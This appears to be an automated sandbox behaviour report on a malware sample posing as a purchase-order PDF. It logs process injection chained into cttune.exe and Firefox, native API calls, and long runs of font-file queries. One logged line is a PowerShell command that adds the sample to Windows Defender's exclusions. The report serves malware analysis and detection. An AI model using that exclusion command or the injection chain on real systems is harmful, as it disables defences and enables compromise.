Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Memory written: C:\Users\user\Desktop\PO-0005082025 pdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: NULL target: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cttune.exe

Thread register set: target process: 5796

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cttune.exe

Thread APC queued: target process: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe

Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process created: C:\Users\user\Desktop\PO-0005082025 pdf.exe "C:\Users\user\Desktop\PO-0005082025 pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Process created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: VuOkdnWJwVVuK.exe, 0000000A.00000002.2978227547.0000000001360000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000000.2206635607.0000000001361000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000000.2363656766.0000000001101000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: VuOkdnWJwVVuK.exe, 0000000A.00000002.2978227547.0000000001360000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000000.2206635607.0000000001361000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000000.2363656766.0000000001101000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: VuOkdnWJwVVuK.exe, 0000000A.00000002.2978227547.0000000001360000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000000.2206635607.0000000001361000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000000.2363656766.0000000001101000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: VuOkdnWJwVVuK.exe, 0000000A.00000002.2978227547.0000000001360000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000000.2206635607.0000000001361000.00000002.00000001.00040000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000000.2363656766.0000000001101000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Users\user\Desktop\PO-0005082025 pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
